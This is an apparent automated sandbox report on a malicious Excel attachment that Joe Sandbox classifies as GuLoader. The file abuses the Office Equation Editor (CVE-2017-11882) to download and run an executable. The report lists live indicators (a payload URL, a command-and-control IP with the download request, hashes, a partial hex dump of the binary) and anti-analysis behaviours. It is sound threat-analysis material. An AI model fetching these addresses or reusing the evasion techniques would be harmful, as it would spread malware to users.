Windows Analysis Report MTIR21487610_0062180102_20210714081247.PDF.xlsx

Overview

General Information

Sample Name: MTIR21487610_0062180102_20210714081247.PDF.xlsx
Analysis ID: 449166
MD5: 168c2cabea51b16aa19a152a652254f5
SHA1: 477715c6a9d3219ea85a60eac9c80af83a102357
SHA256: 9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Virustotal: Detection: 42% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 42% Perma Link
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx ReversingLabs: Detection: 28%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

barindex
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 71MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://ceattire.com/bin_UYDMbHwI28.bin
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 15 Jul 2021 09:06:43 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 13 Jul 2021 17:05:39 GMTETag: "41470-5c7043f493d18"Accept-Ranges: bytesContent-Length: 267376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cpu/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /cpu/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 300F3110.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E54E7 NtAllocateVirtualMemory, 6_2_003E54E7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E55AC NtAllocateVirtualMemory, 6_2_003E55AC
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E54E7 6_2_003E54E7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7036 6_2_003E7036
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E100E 6_2_003E100E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E4071 6_2_003E4071
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E80D4 6_2_003E80D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2958 6_2_003E2958
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2940 6_2_003E2940
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E29B0 6_2_003E29B0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2183 6_2_003E2183
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E42CD 6_2_003E42CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E72C3 6_2_003E72C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B2D 6_2_003E1B2D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B1A 6_2_003E1B1A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7B73 6_2_003E7B73
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B5F 6_2_003E1B5F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E4B8E 6_2_003E4B8E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E8385 6_2_003E8385
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E43F1 6_2_003E43F1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E341B 6_2_003E341B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E844C 6_2_003E844C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E8C82 6_2_003E8C82
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E8CD5 6_2_003E8CD5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E34C4 6_2_003E34C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E350F 6_2_003E350F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E8D58 6_2_003E8D58
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7D52 6_2_003E7D52
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E0EFE 6_2_003E0EFE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E3F0C 6_2_003E3F0C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7F03 6_2_003E7F03
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7F6D 6_2_003E7F6D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E0FB5 6_2_003E0FB5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2793 6_2_003E2793
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E4785 6_2_003E4785
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
PE file contains strange resources
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/11@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE205.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx Static file information: File size 1268792 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx Initial sample: OLE indicators vbamacros = False
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040495E push es; ret 6_2_00404963
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221774 push edx; ret 6_2_002217A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221023 push edx; ret 6_2_00221051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222823 push edx; ret 6_2_00222851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224023 push edx; ret 6_2_00224051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00227024 push edx; ret 6_2_00227051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225825 push edx; ret 6_2_00225851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224833 push edx; ret 6_2_00224861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223033 push edx; ret 6_2_00223061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221833 push edx; ret 6_2_00221861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226034 push edx; ret 6_2_00226061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220038 push edx; ret 6_2_00220061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224803 push edx; ret 6_2_00224831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223003 push edx; ret 6_2_00223031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221803 push edx; ret 6_2_00221831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226004 push edx; ret 6_2_00226031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220008 push edx; ret 6_2_00220031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223813 push edx; ret 6_2_00223841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225013 push edx; ret 6_2_00225041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222014 push edx; ret 6_2_00222041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226814 push edx; ret 6_2_00226841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220818 push edx; ret 6_2_00220841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223063 push edx; ret 6_2_00223091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221863 push edx; ret 6_2_00221891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224863 push edx; ret 6_2_00224891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226065 push edx; ret 6_2_00226091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220068 push edx; ret 6_2_00220091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222074 push edx; ret 6_2_002220A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223874 push edx; ret 6_2_002238A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225074 push edx; ret 6_2_002250A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226875 push edx; ret 6_2_002268A1

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx Stream path 'EncryptedPackage' entropy: 7.99875082678 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7036 6_2_003E7036
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E100E 6_2_003E100E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E4071 6_2_003E4071
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2958 6_2_003E2958
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E42CD 6_2_003E42CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B1A 6_2_003E1B1A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B5F 6_2_003E1B5F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E43F1 6_2_003E43F1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E341B 6_2_003E341B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7D52 6_2_003E7D52
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E0EFE 6_2_003E0EFE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E0FB5 6_2_003E0FB5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E6F9E 6_2_003E6F9E
